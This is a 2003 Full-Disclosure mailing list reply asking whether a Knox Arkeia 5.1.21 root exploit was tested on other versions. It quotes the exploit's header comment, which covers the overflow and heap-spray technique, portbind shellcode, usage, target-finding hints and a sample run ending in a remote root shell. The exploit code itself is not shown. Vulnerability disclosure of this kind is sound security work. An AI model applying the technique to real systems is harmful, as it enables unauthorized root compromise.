Re: [Full-Disclosure] Knox Arkeia 5.1.21 local/remote root exploit
- To: "A. C." <bugtraq_vuln@xxxxxxxxx>
- Subject: Re: [Full-Disclosure] Knox Arkeia 5.1.21 local/remote root exploit
- From: David Hane <dlhane@xxxxxxxxxxxxx>
- Date: Fri, 19 Sep 2003 14:29:16 -0700
Have you tested this on other versions?
DH
On Friday 19 September 2003 10:36, A. C. wrote:
> Exploit attached for Knox Arkeia Pro v5.1.21 backup
> software from http://www.arkeia.com.
>
> /*
> * Knox Arkeia arkeiad local/remote root exploit.
> *
> * Portbind 5074 shellcode
> *
> * Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable.
> *
> * NULLs out least significant byte of EBP to pull EIP out of overflow buffer.
> * A previous request forces a large allocation of NOP's + shellcode in heap
> * memory. Find additional targets by searching the heap for NOP's after a
> * crash. safeaddr must point to any area of memory that is read/writable
> * and won't mess with program/shellcode flow.
> *
> * ./ark_sink host targetnum
> * [user@host dir]$ ./ark_sink 192.168.1.2 1
> * [*] Connected to 192.168.1.2:617
> * [*] Connected to 192.168.1.2:617
> * [*] Sending nops+shellcode
> * [*] Done, sleeping
> * [*] Sending overflow
> * [*] Done
> * [*] Sleeping and connecting remote shell
> * [*] Connected to 192.168.1.2:5074
> * [*] Success, enjoy
> * id
> * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
> *
> *
> */
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html